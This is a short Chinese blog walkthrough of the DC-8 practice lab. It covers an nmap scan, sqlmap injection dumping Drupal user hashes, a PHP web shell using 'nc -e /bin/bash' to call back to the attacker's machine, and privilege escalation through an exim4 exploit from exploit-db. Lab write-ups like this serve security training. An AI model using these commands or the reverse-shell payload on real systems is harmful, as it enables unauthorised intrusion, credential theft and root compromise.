DC-8

DC-8

信息收集

nmap -T4 -A -p 1-65535 192.168.211.140

又是Drupal

发现有nid这个参数看看能不能sql注入

web打点

sql注入

sqlmap -u "http://192.168.211.140/?nid=2" --dbs

sqlmap -u "http://192.168.211.140/?nid=2" -D d7db --tables

sqlmap -u "http://192.168.211.140/?nid=2" -D d7db -T users --columns

sqlmap -u "http://192.168.211.140/?nid=2" -D d7db -T users -C name --dump

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

写shell,读文件权限都不够,直接拿去解密了

成功登陆

反弹shell

在此路径下找到可以写shell的地方,写入

<?php system("nc -e /bin/bash 192.168.211.131 6666");?>

填写表单,发送

python -c 'import pty;pty.spawn("/bin/bash")'

成功反弹shell

提权

SUID提权

find / -perm -u=s -type f 2>/dev/null

发现exim4,searchspolit

下载/usr/share/exploitdb/exploits/linux/local/46996.sh

启动http server

wget下载

这里很奇怪的一点,使用python启动交互式shell反而执行失败,直接执行成功

chmod 777 exp.sh
./exp.sh -m setuid
./exp.sh -m netcat

获取flag

posted @ 2022-02-01 19:57  kar3a  阅读(62)  评论(0编辑  收藏  举报